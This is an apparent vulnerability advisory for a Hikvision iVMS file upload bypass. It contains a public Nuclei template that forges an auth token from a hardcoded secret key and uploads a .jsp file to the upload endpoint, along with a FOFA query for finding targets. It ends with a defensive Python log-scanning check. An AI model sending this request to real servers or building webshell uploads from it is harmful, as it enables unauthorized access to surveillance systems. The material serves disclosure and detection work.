hikvision-ivms-file-upload-bypass: Hikvision iVMS - File Upload Bypass

Date: 2025-08-01 | Affected software: hikvision ivms | POC: Public

Vulnerability description

The Hikvision iVMS integrated security system has an arbitrary file upload vulnerability. An attacker who obtains the encryption key can create a forged token and use it to make requests to the "/resourceOperations/upload" interface, uploading files of their choice. This can lead to unauthorized webshell access on the server, enabling remote execution of malicious code.

PoC code [public]

id: hikvision-ivms-file-upload-bypass

info:
  name: Hikvison iVMS - File Upload Bypass
  author: SleepingBag945
  severity: critical
  description: Hikvision iVMS integrated security system has a vulnerability that allows arbitrary file uploads. Attackers can exploit this vulnerability by obtaining the encryption key to create a forged token. By using the forged token, they can make requests to the "/resourceOperations/upload" interface to upload files of their choice. This can lead to gaining unauthorized webshell access on the server, enabling remote execution of malicious code.
  reference:
    - https://blog.csdn.net/qq_41904294/article/details/130807691
  metadata:
    verified: true
    max-request: 1
    fofa-query: icon_hash="-911494769"
  tags: hikvision,ivms,intrusive,fileupload,auth-bypass,vuln

http:
  - raw:
      - |
        POST /eps/api/resourceOperations/upload?token={{to_upper(md5(concat("{{RootURL}}","/eps/api/resourceOperations/uploadsecretKeyIbuilding")))}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryGEJwiloiPo

        ------WebKitFormBoundaryGEJwiloiPo
        Content-Disposition: form-data; name="fileUploader";filename="{{randstr}}.jsp"
        Content-Type: image/jpeg

        {{randstr}}
        ------WebKitFormBoundaryGEJwiloiPo%20

    matchers:
      - type: word
        part: body
        words:
          - '"success":true'
          - '"resourceName":'
        condition: and
# digest: 4b0a00483046022100b5d391a30801fde156caac83d0ff506f272fe5d39089d713a70dce26233da0ea022100935a8c66ddd19db824da12d361ee75871d6ac30dcbb7ff2e9d6181dbbd5ac577:922c64590222798bb761d5b6d8e72950
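
For defenders, a log check that complements the template above. This is an added example, not part of the original page or the template author's code: it scans web access logs for POST requests to the upload endpoint and records whether the request carried a token with the upper-case MD5 shape the template sends. The Combined Log Format input, the function name `find_upload_requests` and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

UPLOAD_PATH = "/eps/api/resourceOperations/upload"  # endpoint named on this page
TOKEN_SHAPE = re.compile(r"^[0-9A-F]{32}$")  # template sends an upper-cased MD5 hex digest

# Assumed input: Combined Log Format
#   ip - user [time] "METHOD target PROTO" status size ...
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_upload_requests(lines):
    """Return one finding per POST to the iVMS upload endpoint."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m or m["method"] != "POST":
            continue
        url = urlsplit(m["target"])
        if url.path.rstrip("/") != UPLOAD_PATH:
            continue
        token = parse_qs(url.query).get("token", [""])[0]
        findings.append({
            "ip": m["ip"],
            "time": m["time"],
            "status": int(m["status"]),
            "md5_shaped_token": bool(TOKEN_SHAPE.match(token)),
            # 2xx means the server accepted the request: review as a possible upload
            "accepted": m["status"].startswith("2"),
        })
    return findings

# Constructed sample log lines (documentation IP ranges, placeholder token value)
SAMPLE = [
    '198.51.100.7 - - [01/Aug/2025:10:00:01 +0000] "GET /eps/index.html HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Aug/2025:10:02:13 +0000] '
    '"POST /eps/api/resourceOperations/upload?token=' + "A" * 32 + ' HTTP/1.1" 200 187',
    '203.0.113.9 - - [01/Aug/2025:10:02:40 +0000] '
    '"POST /eps/api/resourceOperations/upload HTTP/1.1" 401 64',
]

if __name__ == "__main__":
    for finding in find_upload_requests(SAMPLE):
        print(finding)
```

An accepted request with an MD5-shaped token is the case to review first, since the access log alone does not show the uploaded file name or content.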
